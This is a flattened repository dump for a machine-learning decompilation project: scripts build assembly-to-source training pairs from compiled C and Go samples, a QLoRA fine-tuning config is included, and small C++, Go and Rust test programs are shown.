| There are four data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/mmcgrana/gobyexample 6 | 2. https://github.com/nathany/get-programming-with-go 7 | 3. https://github.com/inancgumus/learngo 8 | 4. https://github.com/callicoder/golang-tutorials 9 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 10 | -------------------------------------------------------------------------------- /finetune/data/rust_corpus/README.md: -------------------------------------------------------------------------------- 1 | # rust_corpus folder 2 | This folder contains many example Rust programs which are used in the current decompilation dataset. 3 | There are three data sources in the current folder. 4 | ## Sources 5 | 1. https://github.com/rust-lang/book 6 | 2. https://github.com/eliovir/rust-examples 7 | 3. https://github.com/ProgrammingRust/examples 8 | Clone these repositories in this folder for the extraction tools to collect the current dataset. 9 | -------------------------------------------------------------------------------- /finetune/deepseek.yml: -------------------------------------------------------------------------------- 1 | # This is the finetuning configuration file for deepseek. 2 | base_model: deepseek-ai/deepseek-coder-6.7b-instruct 3 | model_type: AutoModelForCausalLM 4 | tokenizer_type: AutoTokenizer 5 | is_llama_derived_model: true 6 | 7 | load_in_8bit: false 8 | load_in_4bit: true 9 | strict: false 10 | 11 | datasets: 12 | - path: ./decomp_dataset.json 13 | type: alpaca 14 | dataset_prepared_path: 15 | val_set_size: 0.05 16 | output_dir: ./qlora-out 17 | 18 | adapter: qlora 19 | lora_model_dir: 20 | 21 | sequence_len: 4096 22 | sample_packing: true 23 | pad_to_sequence_len: true 24 | 25 | lora_modules_to_save: 26 | - embed_tokens 27 | - lm_head 28 | 29 | lora_r: 32 30 | lora_alpha: 16 31 | lora_dropout: 0.05 32 | lora_target_modules: 33 | lora_target_linear: true 34 | lora_fan_in_fan_out: 35 | 36 | wandb_project: 37 | wandb_entity: 38 | wandb_watch: 39 | wandb_name: 40 | wandb_log_model: 41 | 42 | gradient_accumulation_steps: 2 43 | micro_batch_size: 2 44 | num_epochs: 3 45 | optimizer: adamw_bnb_8bit 46 | lr_scheduler: cosine 47 | learning_rate: 0.0002 48 | 49 | train_on_inputs: false 50 | group_by_length: false 51 | bf16: true 52 | fp16: false 53 | tf32: false 54 | 55 | gradient_checkpointing: true 56 | early_stopping_patience: 57 | resume_from_checkpoint: 58 | local_rank: 59 | logging_steps: 1 60 | xformers_attention: 61 | flash_attention: true 62 | 63 | warmup_steps: 10 64 | evals_per_epoch: 4 65 | saves_per_epoch: 2 66 | debug: 67 | weight_decay: 0.0 68 | fsdp: 69 | fsdp_config: 70 | special_tokens: 71 | bos_token: "" 72 | eos_token: "" 73 | unk_token: "" 74 | -------------------------------------------------------------------------------- /finetune/extract_c.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | from bs4 import BeautifulSoup 4 | import subprocess 5 | import json 6 | from tree_sitter import Language, Parser 7 | from tree_sitter_languages import get_language, get_parser 8 | 9 | language = get_language('c') 10 | parser = get_parser('c') 11 | 12 | GENERATE = True 13 | 14 | def run_command(command): 15 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 16 | output, error = process.communicate() 17 | exit_code = process.wait() 18 | 19 | output, error = output.decode("utf-8"), error.decode("utf-8") 20 | return exit_code, output, error 21 | 22 | def traverse_tree(tree): 23 | func_sources = {} 24 | cursor = tree.walk() 25 | 26 | reached_root = False 27 | while reached_root == False: 28 | if cursor.node.type == "function_definition": 29 | queue = [cursor.node.child_by_field_name("declarator")] 30 | while queue: 31 | node = queue.pop(0) 32 | if node.type == 'function_declarator': 33 | func_sources[node.child_by_field_name("declarator").text.decode('utf8')] = cursor.node.text.decode('utf8') 34 | break 35 | else: 36 | queue.extend(node.children) 37 | 38 | if cursor.goto_first_child(): 39 | continue 40 | 41 | if cursor.goto_next_sibling(): 42 | continue 43 | 44 | retracing = True 45 | while retracing: 46 | if not cursor.goto_parent(): 47 | retracing = False 48 | reached_root = True 49 | 50 | if cursor.goto_next_sibling(): 51 | retracing = False 52 | return func_sources 53 | 54 | if GENERATE: 55 | f = open('./data/c-by-example.md') 56 | text = f.read() 57 | f.close() 58 | 59 | c_blocks = [] 60 | blocks = re.findall(r'(\'\'\'|```)c\S*\s([\s\S]*?)(\'\'\'|```)', text, re.S) 61 | for block in blocks: 62 | c_blocks.append(block[1]) 63 | 64 | for root, dirs, files in os.walk("./data/cppreference"): 65 | for filename in files: 66 | if filename.endswith(".html"): 67 | filepath = os.path.join(root, filename) 68 | with open(filepath) as f: 69 | contents = f.read() 70 | f.close() 71 | soup = BeautifulSoup(contents, 'html.parser') 72 | source_c_div = soup.find_all('div', class_='source-c') 73 | for div in source_c_div: 74 | extracted_text = div.get_text() 75 | c_blocks.append(extracted_text) 76 | 77 | for root, dirs, files in os.walk("./data/c_corpus/"): 78 | for filename in files: 79 | if filename.endswith(".c"): 80 | filepath = os.path.join(root, filename) 81 | with open(filepath) as f: 82 | contents = f.read() 83 | f.close() 84 | c_blocks.append(contents) 85 | 86 | c_blocks = list(set(c_blocks)) 87 | print(len(c_blocks)) 88 | 89 | if not os.path.exists("./output"): 90 | os.mkdir("./output") 91 | 92 | if not os.path.exists("./output/c_binaries"): 93 | os.mkdir("./output/c_binaries") 94 | 95 | if not os.path.exists("./output/c_prompts"): 96 | os.mkdir("./output/c_prompts") 97 | 98 | count = 0 99 | 100 | for i in range(len(c_blocks)): 101 | tree = parser.parse(bytes(c_blocks[i], "utf8")) 102 | func_sources = traverse_tree(tree) 103 | 104 | if len(func_sources) > 0: 105 | f = open(os.path.join("./output", f"temp.c"), "w") 106 | f.write(c_blocks[i]) 107 | f.close() 108 | 109 | commands = [(f'clang -g -O0 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_no.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_no.out'), 110 | (f'clang -g -O1 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_one.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_one.out'), 111 | (f'clang -g -O2 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_two.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_two.out'), 112 | (f'clang -g -O3 ./output/temp.c -o ./output/c_binaries/c_{i}_debug_three.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_debug_three.out'), 113 | (f'clang -O0 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_no.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_no.out'), 114 | (f'clang -O1 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_one.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_one.out'), 115 | (f'clang -O2 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_two.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_two.out'), 116 | (f'clang -O3 ./output/temp.c -o ./output/c_binaries/c_{i}_no_debug_three.out', f'objdump -d -C -s --no-show-raw-insn ./output/c_binaries/c_{i}_no_debug_three.out') 117 | ] 118 | 119 | for command, objdump_command in commands: 120 | exit_code, output, error = run_command(command) 121 | if exit_code != 0: 122 | continue 123 | else: 124 | exit_code, output, error = run_command(objdump_command) 125 | if exit_code == 0: 126 | for func in func_sources: 127 | pattern = re.compile(rf"<{func}>:\n(([^\n]+\n)*)") 128 | match = re.search(pattern, output) 129 | if match: 130 | filename = objdump_command.split(' ')[-1].split('/')[-1] 131 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(1)) 132 | f = open(os.path.join('./output/c_prompts', filename + "_" + str(count) + ".json"), "w") 133 | if count % 2 == 0: 134 | json_payload = { 135 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the C code for the function that produced the above x86 64-bit assembly. The C code is idiomatic and uses functions, types, and structures from standard libraries.", 136 | "output": func_sources.get(func) 137 | } 138 | else: 139 | json_payload = { 140 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into C code. The C code is idiomatic and uses functions, types, and structures from standard libraries.", 141 | "output": func_sources.get(func) 142 | } 143 | json.dump(json_payload, f) 144 | f.close() 145 | count += 1 146 | else: 147 | print(f"Error in objdump: {error}") 148 | -------------------------------------------------------------------------------- /finetune/extract_go.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | from bs4 import BeautifulSoup 4 | import subprocess 5 | import json 6 | from tree_sitter import Language, Parser 7 | from tree_sitter_languages import get_language, get_parser 8 | from tqdm import tqdm 9 | 10 | language = get_language('go') 11 | parser = get_parser('go') 12 | 13 | GENERATE = True 14 | 15 | def run_command(command): 16 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 17 | output, error = process.communicate() 18 | exit_code = process.wait() 19 | 20 | output, error = output.decode("utf-8"), error.decode("utf-8") 21 | return exit_code, output, error 22 | 23 | def traverse_tree(tree): 24 | func_sources = {} 25 | def find_functions(node): 26 | node_type = node.type 27 | children = node.children 28 | 29 | if node_type in {'function_declaration', 'method_declaration'}: 30 | if node.child_by_field_name('name'): 31 | name = node.child_by_field_name('name').text.decode('utf8') 32 | func_sources[name] = node.text.decode('utf8') 33 | else: 34 | for child in children: 35 | find_functions(child) 36 | 37 | find_functions(tree.root_node) 38 | return func_sources 39 | 40 | if GENERATE: 41 | go_blocks = [] 42 | for root, dirs, files in os.walk("./data/go_corpus/"): 43 | for filename in files: 44 | if filename.endswith(".go"): 45 | filepath = os.path.join(root, filename) 46 | try: 47 | with open(filepath) as f: 48 | contents = f.read() 49 | f.close() 50 | go_blocks.append(contents) 51 | except: 52 | continue 53 | 54 | go_blocks = list(set(go_blocks)) 55 | print(len(go_blocks)) 56 | 57 | if not os.path.exists("./output"): 58 | os.mkdir("./output") 59 | 60 | if not os.path.exists("./output/go_binaries"): 61 | os.mkdir("./output/go_binaries") 62 | 63 | if not os.path.exists("./output/go_prompts"): 64 | os.mkdir("./output/go_prompts") 65 | 66 | count = 0 67 | 68 | for i in tqdm(range(len(go_blocks))): 69 | tree = parser.parse(bytes(go_blocks[i], "utf8")) 70 | func_sources = traverse_tree(tree) 71 | 72 | if len(func_sources) > 0: 73 | f = open(os.path.join("./output", f"temp.go"), "w") 74 | f.write(go_blocks[i]) 75 | f.close() 76 | 77 | commands = [(f'go build -o ./output/go_binaries/go_{i}.out ./output/temp.go', f'objdump -d -C --no-show-raw-insn ./output/go_binaries/go_{i}.out')] 78 | 79 | for command, objdump_command in commands: 80 | exit_code, output, error = run_command(command) 81 | if exit_code != 0: 82 | continue 83 | else: 84 | exit_code, output, error = run_command(objdump_command) 85 | if exit_code == 0: 86 | for func in func_sources: 87 | pattern = re.compile(rf":\n(([^\n]+\n)*)") 88 | match = re.search(pattern, output) 89 | if match: 90 | filename = objdump_command.split(' ')[-1].split('/')[-1] 91 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(2)) 92 | f = open(os.path.join('./output/go_prompts', filename + "_" + str(count) + ".json"), "w") 93 | if count % 2 == 0: 94 | json_payload = { 95 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the Go code for the function that produced the above x86 64-bit assembly. The Go code is idiomatic and uses standard libraries and channels.", 96 | "output": func_sources.get(func) 97 | } 98 | else: 99 | json_payload = { 100 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into Go code. The Go code is idiomatic and uses standard libraries and channels.", 101 | "output": func_sources.get(func) 102 | } 103 | json.dump(json_payload, f) 104 | f.close() 105 | else: 106 | try: 107 | pattern = re.compile(rf":\n(([^\n]+\n)*)") 108 | match = re.search(pattern, output) 109 | except: 110 | continue 111 | if match: 112 | filename = objdump_command.split(' ')[-1].split('/')[-1] 113 | disasm = re.sub(r'\s[0-9abcdef]+:\s', '', match.group(1)) 114 | f = open(os.path.join('./output/go_prompts', filename + "_" + str(count) + ".json"), "w") 115 | if count % 2 == 0: 116 | json_payload = { 117 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nGenerate just the Go code for the function that produced the above x86 64-bit assembly. The Go code is idiomatic and uses standard libraries and channels.", 118 | "output": func_sources.get(func) 119 | } 120 | else: 121 | json_payload = { 122 | "instruction": f"x86 64-bit Assembly:\n{func}:\n{disasm}\n//end of function {func}\nDecompile the above x86 64-bit assembly into Go code. The Go code is idiomatic and uses standard libraries and channels.", 123 | "output": func_sources.get(func) 124 | } 125 | json.dump(json_payload, f) 126 | f.close() 127 | count += 1 128 | else: 129 | print(f"Error in objdump: {error}") 130 | -------------------------------------------------------------------------------- /finetune/merge.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | 4 | # This script allows you to merge many json files into one singular json file. 5 | def merge_json_files(dirs, output_file): 6 | json_objects = [] 7 | 8 | for input_dir in dirs: 9 | for filename in os.listdir(input_dir): 10 | if filename.endswith(".json"): 11 | file_path = os.path.join(input_dir, filename) 12 | 13 | with open(file_path, 'r') as file: 14 | json_object = json.load(file) 15 | 16 | json_objects.append(json_object) 17 | 18 | with open(output_file, 'w') as output_file: 19 | json.dump(json_objects, output_file, indent=2) 20 | 21 | if __name__ == "__main__": 22 | input_directory = ["./output/c_prompts", "./output/cpp_prompts", './output/go_prompts', './output/rust_prompts'] 23 | 24 | output_file = "./merged.json" 25 | 26 | merge_json_files(input_directory, output_file) 27 | 28 | print(f"Merged JSON file saved to: {output_file}") 29 | -------------------------------------------------------------------------------- /split/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Splitting Demo 2 | This repo contains all the code for the demo of splitting the disassembly of a large function into chunks and then decompiling each chunk. 3 | The technique used to split the disassembly in this demo is label splitting where the disassembly is divided into sections based on the different branch labels that exist. 4 | ## function_split.py 5 | This file contains the main code for the demo. It can be run using the following command: 6 | ```bash 7 | python3 function_split.py 8 | ``` 9 | The demo will then run. 10 | Note that this might take a lot of time depending on the number of sections that exist. 11 | There is a generate_llm_response function in this file which can be easily modified to work with any LLM. 12 | For this demo, the data used is from the rumrum binary from the 2021 Decompetition challenge. There are some variables in the file that can be easily changed to work with any program. 13 | # Video of Demo 14 | Here is a link to a video demonstrating the decompilation splitting technique: 15 | [Video #1](https://drive.google.com/file/d/1tNZp2ygdOU-gBVgfqtBYXy7GI8m5hld2/view?usp=sharing) 16 | -------------------------------------------------------------------------------- /tests/README.md: -------------------------------------------------------------------------------- 1 | # Testfiles 2 | This repository contains test binaries and their source code. These binaries can be fed into Ghidra and the plugin to test the accuracy of the plugin. The binaries are from several different languages including, c++, go, and rust. They also implement different features of the languages. All the binaries were compiled on x64 Ubuntu 20.04. 3 | -------------------------------------------------------------------------------- /tests/graph: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/graph -------------------------------------------------------------------------------- /tests/graph.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | class Node { 6 | public: 7 | int data; 8 | std::vector neighbors; 9 | bool visited = false; 10 | 11 | Node(int data) { 12 | this->data = data; 13 | } 14 | }; 15 | 16 | std::map graph; 17 | 18 | // Function to add an edge to the graph 19 | void addEdge(int source, int destination) { 20 | Node* src = graph[source]; 21 | Node* dest = graph[destination]; 22 | src->neighbors.push_back(dest); 23 | } 24 | 25 | // Recursive function to perform depth-first traversal 26 | void DFS(Node* node) { 27 | std::cout << node->data << " "; 28 | node->visited = true; 29 | 30 | for (auto neighbor : node->neighbors) { 31 | if (!neighbor->visited) { 32 | DFS(neighbor); 33 | } 34 | } 35 | } 36 | 37 | int main() { 38 | // Create nodes 39 | for (int i = 1; i <= 7; i++) { 40 | graph[i] = new Node(i); 41 | } 42 | 43 | // Add edges 44 | addEdge(1, 2); 45 | addEdge(1, 3); 46 | addEdge(2, 4); 47 | addEdge(2, 5); 48 | addEdge(3, 6); 49 | addEdge(3, 7); 50 | 51 | // Perform depth-first traversal 52 | std::cout << "DFS Traversal: "; 53 | DFS(graph[1]); 54 | std::cout << std::endl; 55 | 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /tests/http: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/http -------------------------------------------------------------------------------- /tests/http.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func main() { 9 | http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { 10 | http.ServeFile(w, r, "./files"+r.URL.Path) 11 | }) 12 | 13 | fmt.Println("Server is listening...") 14 | http.ListenAndServe(":8000", nil) 15 | } 16 | -------------------------------------------------------------------------------- /tests/lambda: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/lambda -------------------------------------------------------------------------------- /tests/lambda.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | using namespace std; 3 | 4 | int main() 5 | { 6 | vector v1 = {1, 2, 3, 4, 5, 6}; 7 | 8 | [v1]() 9 | { 10 | for (auto p = v1.begin(); p != v1.end(); p++) 11 | { 12 | cout << *p << " "; 13 | } 14 | }; 15 | } 16 | -------------------------------------------------------------------------------- /tests/linked: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/linked -------------------------------------------------------------------------------- /tests/linked.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct Node { 4 | int data; 5 | Node* next; 6 | }; 7 | 8 | Node* head = NULL; 9 | 10 | // Function to insert a new node at the front of the list 11 | void push(int new_data) { 12 | Node* new_node = new Node(); 13 | new_node->data = new_data; 14 | new_node->next = head; 15 | head = new_node; 16 | } 17 | 18 | // Function to reverse the linked list 19 | void reverse() { 20 | Node* current = head; 21 | Node* prev = NULL; 22 | Node* next = NULL; 23 | 24 | while (current != NULL) { 25 | next = current->next; 26 | current->next = prev; 27 | prev = current; 28 | current = next; 29 | } 30 | 31 | head = prev; 32 | } 33 | 34 | // Function to print the linked list 35 | void printList() { 36 | Node* temp = head; 37 | while (temp != NULL) { 38 | std::cout << temp->data << " "; 39 | temp = temp->next; 40 | } 41 | std::cout << std::endl; 42 | } 43 | 44 | int main() { 45 | push(5); 46 | push(4); 47 | push(3); 48 | push(2); 49 | push(1); 50 | 51 | std::cout << "Original List: "; 52 | printList(); 53 | 54 | reverse(); 55 | 56 | std::cout << "Reversed List: "; 57 | printList(); 58 | 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /tests/map: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/map -------------------------------------------------------------------------------- /tests/map.rs: -------------------------------------------------------------------------------- 1 | use std::collections::HashMap; 2 | 3 | fn main() { 4 | let mut map = HashMap::new(); 5 | map.insert("a", 1); 6 | map.insert("b", 2); 7 | map.insert("c", 3); 8 | 9 | for (key, value) in &map { 10 | println!("{}: {}", key, value); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /tests/multi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trailofbits/Codex-Decompiler/f8a3c1981c131a12f9ed8215b42e6fa691daceda/tests/multi -------------------------------------------------------------------------------- /tests/multi.rs: -------------------------------------------------------------------------------- 1 | use std::sync::{Mutex, Arc}; 2 | use std::thread; 3 | 4 | fn main() { 5 | let numbers = Arc::new(Mutex::new(vec![1, 2, 3, 4, 5])); 6 | let mut threads = vec![]; 7 | 8 | for i in 0..5 { 9 | let numbers = numbers.clone(); 10 | threads.push(thread::spawn(move || { 11 | let mut numbers = numbers.lock().unwrap(); 12 | println!("Thread {}: {}", i, numbers[i]); 13 | })); 14 | } 15 | 16 | for thread in threads { 17 | thread.join().unwrap(); 18 | } 19 | } 20 | --------------------------------------------------------------------------------